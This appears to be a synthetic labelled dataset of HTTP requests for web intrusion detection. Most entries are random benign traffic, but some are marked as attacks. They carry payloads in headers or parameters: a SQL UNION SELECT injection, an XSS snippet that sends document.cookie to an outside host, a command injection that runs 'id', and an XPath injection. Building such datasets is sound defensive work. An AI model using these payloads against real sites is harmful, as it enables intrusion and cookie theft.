Trailer: Accept-Language
User-Agent: cghrrzsCaa5p
UA-CPU: StrongARM
UA-Disp: 853,814,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 001x377
Via: 4.5 222.154.68.230, 0.5 www.5idWajy.shtml, 7.2 229.27.41.144
Transfer-Encoding: compress
Upgrade: mNe/8.8, ehIbla/4.3, s6oaa/4.9, cih/1.0
Warning: 212 44.77.164.82:9411 "oseeleemmt3mdltO" 
X-Forwarded-For: 214.238.31.113
X-Serial-Number: 4245119888
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28342
Start - Id: 19275
class: Valid
GET /n@dZN-gfZC1/tA6o4D4jo/tjs2caz6/ElwinntE_2o4.html?te=cTipnlctUacceptr%2Blo&79ftwb=ya%5Dxex%27d&l7@QEdvsPgH=xNtTn&xznlnAttnitr0ue=ktrdde4&@6qLXvWprocessing-instructionxj=i%3B&eesi9k=%7EehvO%5B&bAIVhaBbQ=5&7ns0yaer=awpassthru%24+aUd&easxx=5n&lqBOecthm=xeGy&dtEmodehlNg4=37524&swtcihetijN=6mmO.&rn=014871 HTTP/1.1
Host: www.oclirr.ch:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-icelandic
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-transform
Client-ip: 70.40.223.207
Cookie: oymoqyoinnggH3R=fsueno7ed1cemu;uRteTrtvedouuen=llJFl3dT
Cookie2: $Version="0"
Date: Mon, 27 Dec 04 09:37:22 GMT
ETag: W/"p1OvA.Ka.h.7uW@m-_J"
Expect: 100-continue
From: Aehridef@o4bErsthw.cz
If-Modified-Since: Sun, 18 Dec 05 12:28:59 GMT
If-Unmodified-Since: Mon, 08 Mar 10 21:29:01 CET
If-Match: "@BW9MPVG31fESe2@Fhs"
If-None-Match: "-CHWlYtXWwatY-@68"
If-Range: Sat, 03 Apr 10 05:22:07 UTC
Max-Forwards: 4
MIME-Version: 6.0
Pragma: yeogtt='dmelnulp'
Proxy-Authorization: Basic OGVlYm9zOnJpYm5z
Authorization: Basic ZW1jY05leTplaFVDRWVxYQ==
Range: 784688-250,21331-
Referer: http://ps2ehgn.de/iuT3mt.asmx
TE: gzip,trailers,trailers
Trailer: Host
User-Agent: Mozilla/3.9 (compatible; Konqueror/8.1; SunOS sun4u; dtrda; tseszFnIa3)
UA-CPU: 68000
UA-Disp: 4381,601,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3128x8633
Via: 5.1 224.5.147.122, 2.9 143.189.83.235
Transfer-Encoding: deflate
Upgrade: e1En/4.6, xtnec/2.1, tlslos/3.4
Warning: 029 www.Bnho.gif "udTe0toroga" 
X-Forwarded-For: 246.243.162.43
X-Serial-Number: 750079016802641903
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19275
Start - Id: 12093
class: Valid
GET /Y5dYL1/liMa8cwO1A/rxoarnFOl_fLGbfcMUa/VzJ9/iJAVGns9vvbBMqxWtX/ayweass10nk2hq/racmr1w.mspx? HTTP/1.1
Host: 226.25.62.81
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-turkish;q=0.2, big5, windows-1251;q=0.3, windows-874;q=0.8
Accept-Encoding: compress;q=0.1, deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 222.100.224.249
Cookie: eE2scriptFNGiSD4=ui0Dmn;jiiem7s=eittoer
Cookie2: $Version="438"
Date: Sun, 12 Feb 06 10:21:03 GMT
ETag: "t8ZXMYlbV1qZJea@j1yV"
Expect: onaNtti6=wymieb
From: oiswea@ontis.org
If-Modified-Since: Tue, 21 Oct 08 15:23:53 CET
If-Unmodified-Since: Mon, 26 Jan 04 20:54:24 UTC
If-Match: "qnFgZ_xULQ2C8iSW2jJ"
If-None-Match: *
If-Range: Thu, 20 Sep 07 08:16:11 GMT
Max-Forwards: 58
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM cXlncnZpOW9qcmppYTlvdHFvODZiM2Rpcmx5dXR5bWVvbGFndDhhZThybDd2
Authorization: NTLM dGZBMnNlcmhvZWhqZHBzcGpkY2VhYW5xZXlodXVlY205cnR1ZWV6YmV2bnNiZWM=
Range: -59437
Referer: /sweb0xnv.pdf
TE: trailers,trailers,deflate
Trailer: Trailer
User-Agent: Mozilla/5.6 (compatible; MSIE 0.5; Open BSD i586; sa9y)
UA-CPU: Sparc
UA-Disp: 750,6227,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 802x8230
Via: 6.0 www.ttexs5.png:56978
Transfer-Encoding: deflate
Upgrade: cymh4g/4.9, oieu/3.1, ixccn/1.8, eci/0.7
Warning: 364 www.rnndhhu.html "lNiB7of9mccT8t4" 
X-Forwarded-For: 222.31.114.163
X-Serial-Number: 739755
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12093
Start - Id: 42714
class: SqlInjection
POST /5bdresdiseeoeN6a1/iW3JucaPiFgLZK1mK3/lAowkOal51/nuTaMx/4qf.shtml? HTTP/1.1
Content-Length: 135
Content-Language: bsa
Content-Encoding: identity
Content-Location: http://saizSmIt.de/snmnctn/a8et/qeeol.mdb
Content-Type: application/x-www-form-urlencoded
Host: 58.33.146.71
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: windows-1252, x-mac-turkish
Accept-Encoding: *;q=0.8
Cache-Control: only-if-cached
Cookie: mvnatl9raaps=nLrmIa3Ig;PBKq=76290856
Cookie2: $Version="136"
Date: Fri, 08 Jul 05 01:06:25 UTC
ETag: W/"1NRkeUMPDHmaSZJUaRf2"
If-Modified-Since: Fri, 08 Feb 08 19:17:23 GMT
If-Unmodified-Since: Tue, 29 Jun 04 14:33:10 CET
If-Match: "Qnu4P27_d44VKU1"
If-None-Match: "0kQ3S4iUeGW@D@Qjc_MV"
Max-Forwards: 632
Pragma: tofeHanr='baunO'
Range: 09-
Referer: /nAke/kkeef/on0l/etd8a/nwwbs.tar
User-Agent: '    )/**/UNIONALL/**/SELECT/**/339/**/FROM/**/tR0on/**/WHERE/**/( ''= '  /**/
Via: 8.9 180.109.211.80
Transfer-Encoding: compress
Warning: 248 64.93.227.168:634 "DanimetRfrErrctntc" 
----: ----------------------------------

t6Ellipfnhst=edQ-rZ&cko4is845a=dt:|unionmstdinrms&_bGU=001910&tevmirwneaiee=6otiEIes&nfNntrnaStsxAn1=174967&5t6oItk=ascaezstemzorgh

End - Id: 42714
Start - Id: 29152
class: Valid
GET /D7criAcytldt/d37L.xNhxOvL_V/r5Z/tQT.n@@u89pIdbd7/ces/sC7wfndy/BrXl_RNC.nsf?hzcet8e4Clpgase=cfqPHYKltRX&scashcueoln=tiqhixse8&ozs6msokdjssHaw=bgsound%282n%3Cs+&hEcsms=0498 HTTP/1.1
Host: 180.71.76.248
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 6lifkzn8-o;q=0.8, g-7utat7s;q=0.8
Cache-Control: lesyins='drt'
Client-ip: 155.217.178.62
Cookie: 4mkrweoouent=3058176;a2cayyx=5628277537;akzlOcnIme8adi=eru
Cookie2: $Version="4"
Date: Sun, 06 Mar 05 23:08:46 GMT
ETag: "kay.WfhEQ8iXkgl"
Expect: 100-continue
From: espn@htNyusgoaB.com
If-Modified-Since: Wed, 03 Nov 04 15:13:19 GMT
If-Unmodified-Since: Fri, 18 Nov 05 23:42:45 UTC
If-Match: "XVm11j.AE8c_P374e8kt"
If-None-Match: "VFm4@yPqLSBEKB_"
If-Range: Fri, 01 Jun 07 21:07:53 GMT
Max-Forwards: 975
MIME-Version: 6.1
Pragma: 5ee='cRsc'
Proxy-Authorization: r6cRja o1ns=aoel
Authorization: Basic aWMwbzVBODpvaDhF
Range: 7756-,-27098
Referer: /yun01gat/ayota.cfm
TE: trailers,gzip
Trailer: User-Agent
User-Agent: 7Fz1f_x@ http://www.Toosto.ch
UA-CPU: PowerPC
UA-Disp: 758,7778,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 0871x656
Via: 3.0 www.laiy3reE.htm, FTP/9.2 166.190.39.250
Transfer-Encoding: gzip
Upgrade: ec9/9.0, tdi/9.7, rri/1.9, iedD92/0.3, piyrsf/0.2
Warning: 235 www.aliaS.js "ienttr9bl" 
X-Forwarded-For: 97.58.176.102
X-Serial-Number: 59543
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29152
Start - Id: 12667
class: Valid
GET /unoiaylsftto9/yrontnIfa5ifE72nea/nDD4zPfMm3oYBXm_3LhE/etvrskbrhne0ae/lEIEhxs5/aEo/lpieo69r7hes/iC.jGhhr58Tmqf/hPatm@Wi9t7KMud_0.mspx?AologFNWtBM=9&mwejhhuaeig9re=AmT3irias&nw1iRnniotu=653201861&inTaadrnphdhe=47&s86Ebtmec=1796&o6SjkpWscriptG=uackmkaoebl&wnsfao=xlyaFtxihn&AYOQ9=ciobbess&nEe=mH%7E%29&zaezkdloai=rlFfRUMp&ImrV4tcopyHU=dla2as&pdnm=54417&lk=rmi&7eaS=usRnGNO&lfhni=%2B3e0A HTTP/1.1
Host: 212.12.42.180
Connection: keep-alive
Accept: video/quicktime;q=0.0, video/quicktime;q=0.0, video/*
Accept-Charset: x-mac-hebrew;q=0.1
Accept-Encoding: 
Accept-Language: 8t0dsrl9-aneet
Cache-Control: no-store
Client-ip: 106.196.115.151
Cookie: aee=i;hssEddQS=7r;hiRmnxt9=ncmAsreuobnnvte;.K1gnMnvRX6id=eercmd nn8ioa7;OdhEr=si
Cookie2: $Version="1"
Date: Sun, 07 Jun 09 04:00:02 UTC
ETag: W/"c7QYY67P8fk3zM_1"
Expect: 100-continue
From: rtlib@9redOea8.be
If-Modified-Since: Wed, 17 Sep 08 17:50:56 UTC
If-Unmodified-Since: Mon, 27 Oct 08 02:11:17 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 02
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: NTLM dDZocGFoY2FlbXZsN3JzZVN0R25OMXJyZXRvZnRlT2U=
Authorization: Digest realm
Range: 4-14020,90205-
Referer: /henvY/bgCn/onleAy/2Cte/ltelqe.exe
TE: trailers,trailers,gzip
Trailer: Range
User-Agent: Mozilla/0.0 (X11; U; SunOS sun4u 6.7; rh-de; rv:9.1.5) Gecko/52300588
UA-CPU: PowerPC
UA-Disp: 8687,0336,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 961x7915
Via: 8.8 www.1u7Poee7.js:5, 4.5 www.ioqolob6.css, 9.6 212.55.201.209:45
Transfer-Encoding: deflate
Upgrade: oedu/2.8, erlke/9.0, 69utos/0.6, enrd6b/0.7, gblt/4.5
Warning: 604 0.169.62.121 "ntoiigc3nubtmi3tnc" 
X-Forwarded-For: 204.159.248.29
X-Serial-Number: 5004976
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12667
Start - Id: 24779
class: Valid
GET /r9Pl6-iqe/rr/rny3d95D/IWMzZewzMQ/tqeIdeayrhnt/ej3@GvxlRswYgrC/hUHWCDyDE3zOE5.php3? HTTP/1.1
Host: 207.204.108.20
Connection: sdnaB
Accept: application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 80.183.15.166
Cookie: tdan7s=eoi
Cookie2: $Version="05"
Date: Sat, 09 Sep 06 05:00:08 UTC
ETag: W/"I3hzK5@Om-aSEtTjbiL"
Expect: 100-continue
From: tOE8aas@narEhRha.org
If-Modified-Since: Wed, 21 Jan 04 06:29:42 GMT
If-Unmodified-Since: Wed, 14 Apr 10 07:46:16 CET
If-Match: *
If-None-Match: "n4JcPzPN..vdmyg"
If-Range: Mon, 02 Feb 09 22:20:29 UTC
Max-Forwards: 53
MIME-Version: 8.0
Pragma: rh=ehsaE0
Proxy-Authorization: Nixaoe ihecer=0gNx
Authorization: NTLM aWVrbXNqbmlIc2xzUmVvem5hdTlpcnl3cm91ZWVpaDl0b21mU3Npb290bmFu
Range: 0-7,-481455
Referer: /luohh/tjbo0a/0ouals/mped/ninueteu.jsp
TE: deflate,trailers,gzip
Trailer: TE
User-Agent: 49HhmMw (hbREI8Y; a68hHrUc)
UA-CPU: MIPS
UA-Disp: 1309,0345,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 540x246
Via: HTTP/6.9 226.244.174.105, HTTP/5.4 15.235.233.82
Transfer-Encoding: deflate
Upgrade: estt9/5.5, deic/7.1, ktt/1.6, tweoz/2.1
Warning: 860 www.bs37c.png:5265 "rnistmsoesi" "Sun, 27 Mar 05 17:11:49 UTC"
X-Forwarded-For: 94.66.48.118
X-Serial-Number: 05073071780221168240
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24779
Start - Id: 48220
class: XSS
PUT /kunsybheb/.GW/a2iEiP/l5ezYdDe4oX5AaaXT/eVyk7xooLAtfFUlut/Ebniqdaldtl0sa6ete/erc/sitleTrhsxraesht0h0t/-plA6.pl? HTTP/1.0
Content-Length: 190
Content-Language: geodfcHe
Content-Encoding: compress
Content-Location: http://td069S.net/aTssn/ehpjor/TGdl1ca/riahHIe/fhia.php
Content-MD5: Mmhld2kxbG8zRzZwN2xzNg==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Fri, 18 Jan 08 11:20:53 UTC
Host: www.daliighsnu.biz
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: windows-1254;q=0.6, utf-8, macintosh;q=0.3
Accept-Encoding: 
Accept-Language: s0t7pnt-rnsitoi;q=0.8, ed-ngec8Tah, NrS-h0ls;q=0.5
Cache-Control: no-cache
Cookie: lteuhdbeq6Aoc=292;xicelesneiue=se;Itpd0VncRBwSI=13;eA6vhgrtfa=lQuVlfF@XJ;UaXfP=laiovdloereiet
Date: Thu, 10 Jun 04 04:17:38 GMT
Expect: 100-continue
If-Modified-Since: Thu, 08 Sep 05 09:16:57 UTC
If-Unmodified-Since: Mon, 11 Feb 08 06:50:53 CET
If-None-Match: *
If-Range: Tue, 23 Jun 09 21:14:54 GMT
Max-Forwards: 6
Pragma: en=ilbt
Referer: /tsiwAie.conf
User-Agent: <div onmouseover =  " [document.location.replace    ('http://www.ilmaerng.com/cgi-bin/tianeneret.cgi'+document.cookie);]  " >
UA-Disp: 3623,950,32
UA-Pixels: 9177x704
Via: 5.3 52.196.197.16
Transfer-Encoding: deflate

TmArermwegm2i=odirPl>oopash&0gr=e;uhttps&oqtoop1w3rbocje=aT92osn&tnte=jcntyag&l4w6sA89i=air4izu0n&reulisedeeobanf=hrhritm3oubanone&stxombrsr=3&uTn=869&n9id=snblrircpeDxobeno&og=anuhdpfod

End - Id: 48220
Start - Id: 5533
class: Valid
POST /rHM@1y4oy.H4gxK6GhC/oeeeeutfhre/qrg/tfBnxzf7x.ayJZf2p8ut/cuerAesivmnssHbt/t_jI.UVyig/aqvdT8iwUP_L.37cmz6U/c.1S6B_jo.cgi? HTTP/1.0
Content-Length: 206
Content-Language: mQX,yr2d,uorae
Content-Encoding: deflate
Content-Location: /ngsearde/soeel/taee/vls2v/emTo36y.swf
Content-MD5: dXZUQWVjZW50ZXNhaWhzdA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 20 May 09 17:50:23 CET
Last-Modified: Sat, 13 Nov 04 04:51:29 UTC
Host: 158.211.42.154
Connection: close
Accept: */*
Accept-Charset: x-mac-korean, iso-8859-3;q=0.7, windows-874;q=0.5
Accept-Encoding: gzip;q=0.4, deflate;q=0.2
Accept-Language: nasveph-ab, iinsUtei-st, iHoa-ear, RddW-igmcoYvd;q=0.7, a4mVTin-exaP
Cache-Control: only-if-cached
Client-ip: 236.72.177.33
Cookie: atimwril=jgsnwttss;deleten-Q3WZchild1U=wd3E7FLdts;aeetehhcsintt=lMmYYN
Cookie2: $Version="62"
Date: Tue, 23 Jun 09 18:30:52 UTC
ETag: W/"7OxmeWWIPEDpRJ29"
Expect: 100-continue
From: rCwltOn@8nntmteThr.de
If-Modified-Since: Mon, 18 Apr 05 21:35:57 GMT
If-Unmodified-Since: Sat, 07 Jul 07 01:31:05 CET
If-Match: "XpzupU8.KsvfaTah2"
If-None-Match: "5-iRm68q5RxOGfiG1jB"
If-Range: "Ei4TuqLG65yfax7r7"
Max-Forwards: 919
MIME-Version: 4.0
Pragma: hagralr='rHs3tu'
Proxy-Authorization: Basic NG14MmU5Omxzbm5vbWM=
Authorization: NTLM YUV0Z2Zzd2x0bG8wanRlb2hzY2g0NzgxYmVyN3lnbmlQNzhF
Range: 6092-077254
Referer: /t75hGxh/HHls/o8srya/kyerctt/tinHmb.dll
TE: chunked,trailers
Trailer: Proxy-Authorization
User-Agent: ofalw/3.8.8.7
UA-CPU: x86
UA-Disp: 295,212,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 333x0999
Via: 6.3 www.oe1n.html
Transfer-Encoding: gzip
Upgrade: Hihns/1.6, ORos/3.8, etn9/6.1
Warning: 096 www.Sbfne.tiff "89IbUita" "Wed, 23 Dec 09 11:24:02 CET"
X-Forwarded-For: 87.149.9.72
X-Serial-Number: 5097796244152405039
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

QNcformK=7157&dLwn=110154&exryegnR=toR&asuhheot50taiu=mHiRn0ex9to33&en=3109&ulaciDipdeteo=%E&ldjlsperlgmetanph-.FPo=00982706&tu8zt=nequChttpldleESoslrAr |&thoftagthfpctn=tlenetcat6@ oalogw&Aal=Nohlog 

End - Id: 5533
Start - Id: 32386
class: Valid
GET /kqrKz/9fwQ_ECUNag-SaAv/necqt6apmoto.css?rTt6oed=iPW&NRoXWnY4l=9&-15xUKBSo6H=mMxb HTTP/1.0
Host: www.IxtaopNoHo.com
Connection: close
Accept: */*;q=0.3
Accept-Charset: iso-8859-1;q=0.1, cp-950, windows-1257, us-ascii;q=0.4, hz-gb-2312;q=0.3
Accept-Encoding: *;q=0.7
Accept-Language: fi-oeeih;q=0.9, im6a-hX
Cache-Control: no-transform
Client-ip: 108.83.0.215
Cookie: naoadaoSncsna=sservices=
Cookie2: $Version="57"
Date: Fri, 09 Jan 09 12:19:08 CET
ETag: W/"6oB9mofqMr5DqiT"
Expect: ajnerm=onntwu;abgnaaoI=itsi
From: itad@eosuny.org
If-Modified-Since: Thu, 04 Mar 04 08:33:22 CET
If-Unmodified-Since: Thu, 28 Dec 06 06:08:02 CET
If-Match: "CsRQHE7xDA.lvm1ouv2"
If-None-Match: "jsXCbpXs0iVNJ7qFS"
If-Range: Sun, 18 Mar 07 13:50:32 GMT
Max-Forwards: 5003
MIME-Version: 4.2
Pragma: ss0tnu='rl4eslR'
Proxy-Authorization: NTLM U2p0M29sOW5uaURuckZnaVQ3eXJ1bGVibzFidTJ0Njc=
Authorization: Digest qop=auth-int
Range: 36-,82952-6516,-8189
Referer: http://www.hsdurv.it/ttb9.mdb
TE: gzip;q=0.8
Trailer: Upgrade
User-Agent: elmdegtrierdgsei
UA-Disp: 0077,169,16
UA-OS: Windows NT
UA-Color: color8
Via: 9.8 www.ste1.jpeg
Transfer-Encoding: deflate
Upgrade: ddG/8.0, tra/2.3
Warning: 620 www.jgtesooe.tiff "ezqhi" 
X-Forwarded-For: 130.13.184.238
X-Serial-Number: 02894265118985687
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32386
Start - Id: 36676
class: OsCommanding
GET /si3ti8OtaTetnc/endkritcu/eFucOLzpbI/o-KbhkJ7_0NJNL/usgziRYu/enaOhtooVuan93ce/uoeoaoiu4eodiT.cgi?fwoOutlPfaaynsa=%24e%247t&c4vbin=0io6iebt&tujpjtte8n=4&rip=tHowgilajx HTTP/1.1
Host: www.7unn1ma.org
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: x-mac-roman;q=0.6, iso-2022-jp, iso-10646-ucs-2;q=0.1, iso-10646-ucs-2, x-mac-japanese;q=0.4
Accept-Encoding: deflate;q=0.1
Accept-Language: eJ3-hla;q=0.4
Cache-Control: no-transform
Client-ip: 14.224.231.96
Cookie: aBEsspwUt2Vinnm=3w ntr>hoeFIhce pb;ry=vtaPk3x3;wDTbasactltf=o<t6Ea;eths6riSNn=andxWnph-nf;5encffs=093099
Cookie2: $Version="4"
Date: Thu, 19 Oct 06 15:35:55 UTC
ETag: W/"J.uV38hxGkiF2CAj"
From: e3ciy@eehmhnotl.be
If-Modified-Since: Fri, 08 Jul 05 10:27:38 UTC
If-Unmodified-Since: Tue, 04 Jul 06 06:48:36 GMT
If-Match: "RmMLW1eJOD5eXWZ@"
If-None-Match: "V9P8oxlWxdFOj_FbQ"
If-Range: Wed, 18 Apr 07 02:47:41 UTC
Max-Forwards: 7669
MIME-Version: 5.4
Pragma: eadZmk=arkcia
Proxy-Authorization: Basic bXRtMzQ6Um9zcnNFZA==
Authorization: 3ib3d teaohi=mrczdkh
Range: 5644-,9100-29
Referer: /gnrflzfc/isea2oa.htm
TE: gzip
Trailer: If-Match
User-Agent: |  echo "  Content-Type: text/html"     ; echo   ""     ;   id \0
UA-OS: FreeBSD
UA-Pixels: 211x4085
Via: 3.2 www.iueo.jpeg:7, sjtdii/1.8 www.mey5ekob.htm
Transfer-Encoding: KherO; 8zTeoI4=totdz
Upgrade: sr5w/1.7, r9a/4.8
Warning: 061 72.184.224.213:239 "i7ira53rgk" 
X-Forwarded-For: 173.248.108.34
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36676
Start - Id: 29317
class: Valid
GET /vIvlWgMltYBzGk8tiO/r@7g0lWe0q1D/tWBA@h/eudvNehs6h.dll?3ToeaucSar=8fgmedtos&WBU2_l=4912130&x0a-oZRL9SZ.L=72&HfeXosiNiSarl=gXt&YyluA1wb=3&dnusph2rit=lnInode%3Dini%3A%5Csqr3tunionew&Ru=9852671&eDchildazpA6J_=4757&duJk8s=82973383&bhydfJeaeH=63342379&A3enepdoeTkett=iaD&ARIa8D8=7788018&g4ee=im3s2 HTTP/1.1
Host: www.redla.be
Connection: close
Accept: text/*, audio/*;q=0.5, image/*;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: deflate;q=0.1, gzip;q=0.0
Accept-Language: t6iqmt8-e, icfooc-eosd;q=0.8
Cache-Control: X55dert=taoHudp
Client-ip: 72.163.184.123
Cookie: 3houoral30sgmte=0hopp;aiheOnl=76782;l.@0=wmaxo98e)Traxeoabody+rcp;La=l sne;KGiRPM=6397;nneOp=97
Cookie2: $Version="22"
Date: Sun, 12 Sep 04 06:38:25 UTC
ETag: "MvqaSOFWXvyFlg8J-"
Expect: r4ncne
From: yttt5iy@rcto.com
If-Modified-Since: Thu, 03 Sep 09 02:53:52 GMT
If-Unmodified-Since: Fri, 20 Aug 04 22:32:56 UTC
If-Match: "7v.L_uczYfDa@Dh"
If-None-Match: "Ae6gyGKyPd6fw90"
If-Range: "G5ePmjC3lCt7sTr84"
Max-Forwards: 372
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: NTLM aGdmeUVjdG1SZHRpNXRldWVhbm11b2NoN3JuaXRjdXVyZW9l
Authorization: Digest algorithm=scSef37n
Range: 00-
Referer: /amtilaT.dll
TE: trailers,chunked;q=0.3,trailers
Trailer: Transfer-Encoding
User-Agent: setr (eS6KXAIkY)
UA-CPU: StrongARM
UA-Disp: 575,351,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 553x667
Via: nci/1.1 www.hanMiphi.css, FTP/2.2 150.199.112.88
Transfer-Encoding: aE4dlt; asdr=bEets
Upgrade: n1tlH/0.1, Iwotm/0.8, 4mr/3.8, entnl/4.8
Warning: 784 254.111.98.187 "oOa4tmsi" 
X-Forwarded-For: 63.57.100.153
X-Serial-Number: 892680378227754
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29317
Start - Id: 4221
class: Valid
PUT /DebileDnAiemowaseoir/nsdarbaeHt9uoi2eae/eLkS-a4/ex9v7HwQZ-_/Orj/TaysersOxTbpe/t0EZv@6xh-Q/l99LtZQBsii89lxQS5MK/nBa7e9dYLSHUcDe-K.44/hrtn3aec59td6elrx/gPjQ@L_.gcRX/k7NSiGwkyXA.tiff? HTTP/1.1
Content-Length: 53
Content-Language: tan,td0tzT
Content-Encoding: gzip
Content-Location: /TlitsL/slrate/el1t2/nalNoljt.mpg
Content-MD5: OGltWnRhb284TmQ0N21rdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Mar 04 22:02:45 GMT
Last-Modified: Fri, 18 Aug 06 14:56:46 GMT
Host: 210.44.106.33:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: weriiid-ae
Cache-Control: max-stale
Client-ip: 39.254.93.91
Cookie: toOoir1Tmens=:sm;stSxclonWf9pu=7wrsgoeerBtb;osdilotTle=rIS;flin@lMyz=233
Cookie2: $Version="996"
Date: Sun, 10 Sep 06 06:12:03 CET
ETag: W/"X-Jc8ESdz7CYeWwj"
Expect: 100-continue
From: hjihe3k@naahlyi3u2.ch
If-Modified-Since: Mon, 13 Nov 06 20:02:17 UTC
If-Unmodified-Since: Tue, 21 Mar 06 02:58:31 CET
If-Match: *
If-None-Match: "qv0w4YNtfdn0TiC"
If-Range: *
Max-Forwards: 1013
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest username="a4tnm"
Range: -15,-05,72-397
Referer: http://luiEte.org/wIg74rtt/eced/ahbsweul/7sas.pl
TE: trailers,trailers
Trailer: Referer
User-Agent: teHjxi
UA-CPU: x86
UA-Disp: 030,366,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2347x8013
Via: HTTP/2.8 85.24.105.108
Transfer-Encoding: Ngvlha
Upgrade: 5ck/7.3
Warning: 544 www.hni2dj.shtml:11 "OemiccOl" 
X-Forwarded-For: 240.213.181.129
X-Serial-Number: 1489164052019432947
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

wz2ecw=h%linkeqchildcfromiy&Ebgsound13Sdb.qTu@=nJN5

End - Id: 4221
Start - Id: 49357
class: XPathInjection
GET /d60QGfhb.7/@RjeJPpC0/2gBel@n/FyM1Q/o1osw@TE8ezRAHF9NOZX/Pgo/t4rbaWQDte/ohAErheugin4cdoad/iM40OJ.A/s9oY.rB1e0SUXqz.html?npydenP5diU=2869656207&CtfaX1Xel2=lrTazg%40lEohLee&utM=048&eggooekhoemn=77611122&vctrein=ntoaiopse%29ea&z2adminR=bwaZ0g&se=dssd5telnet%5Diachildc3n9+pi&6erh5dfjtosi=7vagwwppagEle3pe&BeUtZ9yqa=tY%40&suioenqrh3td=04822&JenIB0q5=a4t%2Fare%2Flset1%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D2%5D+++or++++%27aa%27%3D+++%27&p7imgb.ss=i8XQprN9 HTTP/1.0
Host: 83.147.81.103
Connection: close
Accept: application/rtf;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 220.29.194.166
Cookie: gDsomtaf=Yti;H8l9pl3nehe=~nhrnm+boaio;wrceosw=17185
Cookie2: $Version="189"
Date: Sat, 21 Jul 07 08:38:33 CET
ETag: W/"e7ALYWdkwT_kw1lOFgF"
Expect: 100-continue
From: EgerC@tafwi.com
If-Modified-Since: Wed, 12 Aug 09 02:28:53 CET
If-Unmodified-Since: Tue, 22 May 07 22:37:34 GMT
If-Match: *
If-None-Match: "fVDI5P1-cC7e9XqZ0F_"
If-Range: *
Max-Forwards: 87
MIME-Version: 2.9
Pragma: eeemst0e=gz
Proxy-Authorization: Basic b2YwdHI6YU5uZXNvdw==
Authorization: Digest opaque="Eoluor"
Range: 896-
Referer: /hT8see/nnPB72/oweaIX.tar
TE: trailers
Trailer: Proxy-Authorization
User-Agent: ySGK5M- http://www.lwSzk.de
UA-CPU: StrongARM
UA-Disp: 646,996,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 953x2070
Via: dgbso/6.1 159.184.122.174, 2.4 www.sheaEo.jpg
Transfer-Encoding: compress
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 168 180.56.143.92 "19ohloeeIes" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49357
Start - Id: 23951
class: Valid
GET /taandpassthru7/enfptccT/arsniSrf7sunRht9An/leaiDha/eQnEGNF9oAk/htits.gif?d4wee=uifre5tdapuihgi&llltehhytim=5connecttryii%2Bue+0%5Dg&nsatibuplert6al=520&Lpfds=eybAl_jEYQ&onpe=4841745&aocsfe=shaffs&e6tc=mHwPQVr&aTnQeabkd=a%3Bha&@CaGzURn2L2=9788&6Eer1Dn0mFitt6a=drmduxeegnBr&Onsmah9s1nniN=716280615 HTTP/1.1
Host: 238.158.148.213
Connection: close
Accept: image/*, text/html, application/x-tar
Accept-Charset: *;q=0.4
Accept-Encoding: identity, deflate;q=0.1
Accept-Language: eimhogee-3mt;q=0.0, mn-5Et5ash, acsaea-3td5ure, nbe-dst;q=0.9
Cache-Control: only-if-cached
Client-ip: 237.51.196.149
